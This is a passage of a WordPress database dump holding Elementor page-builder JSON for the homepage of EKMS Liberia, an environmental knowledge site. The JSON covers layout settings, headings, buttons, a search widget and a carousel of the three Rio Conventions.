ize\":25,\"sizes\":[]},\"items_text_typography_font_weight\":\"700\",\"slides_to_show\":\"3\"},\"elements\":[],\"widgetType\":\"jet-carousel\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"View All Agreements\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/multilateral-environmental-agreements\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(13248,2145,'_elementor_version','2.7.5'),(13249,2145,'_elementor_template_type','wp-page'),(13250,2145,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(13254,2146,'_wp_page_template','default'),(13255,2146,'_elementor_edit_mode','builder'),(13256,2146,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"slideshow\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"rgba(255,255,255,0.78)\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5500000000000000444089209850062616169452667236328125},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":2035,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_epa.jpg\"},{\"id\":2036,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home1.jpg\"},{\"id\":2037,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home2.jpg\"},{\"id\":2038,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home3.jpg\"},{\"id\":2039,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_maps.jpg\"}],\"background_slideshow_ken_burns_zoom_direction\":\"out\"},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.04)\"},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"left\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":65},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25},\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"900\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EKMS provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.<\\/p>\",\"align\":\"left\",\"text_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_font_family\":\"Roboto\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_type\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#002600\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49af793\",\"elType\":\"widget\",\"settings\":{\"items_list\":[{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd-1.jpg\",\"id\":1854},\"item_title\":\"UNCBD\",\"item_text\":\"The United Nations Convention on Biological Diversity\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-on-biological-diversity\\/\",\"item_link_target\":\"\",\"_id\":\"7311fcf\",\"item_content_type\":\"default\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_fccc.jpg\",\"id\":1856},\"item_content_type\":\"default\",\"item_title\":\"UNFCCC\",\"item_text\":\"The United Nations Framework Convention on Climate Change\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-framework-convention-on-climate-change\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"8abca95\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_ccd.jpg\",\"id\":1855},\"item_content_type\":\"default\",\"item_title\":\"UNCCD\",\"item_text\":\"The United Nations Convention to Combat Desertification\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-to-combat-desertification\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"6b2d2f2\"}],\"item_layout\":\"banners\",\"animation_effect\":\"sarah\",\"img_size\":\"medium\",\"title_html_tag\":\"h6\",\"equal_height_cols\":\"true\",\"slides_to_scroll\":\"3\",\"pause_on_hover\":\"true\",\"autoplay_speed\":2500,\"centered\":\"true\",\"background_background\":\"classic\",\"normal_opacity\":0.40000000000000002220446049250313080847263336181640625,\"hover_opacity\":0.59999999999999997779553950749686919152736663818359375,\"items_title_color\":\"#ffffff\",\"items_title_typography_typography\":\"custom\",\"items_title_typography_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"items_title_typography_font_weight\":\"900\",\"items_title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":2.5,\"sizes\":[]},\"items_text_color\":\"#009ee2\",\"items_text_typography_typography\":\"custom\",\"items_text_typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"items_text_typography_font_weight\":\"700\",\"slides_to_show\":\"3\"},\"elements\":[],\"widgetType\":\"jet-carousel\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"View All Agreements\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/multilateral-environmental-agreements\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop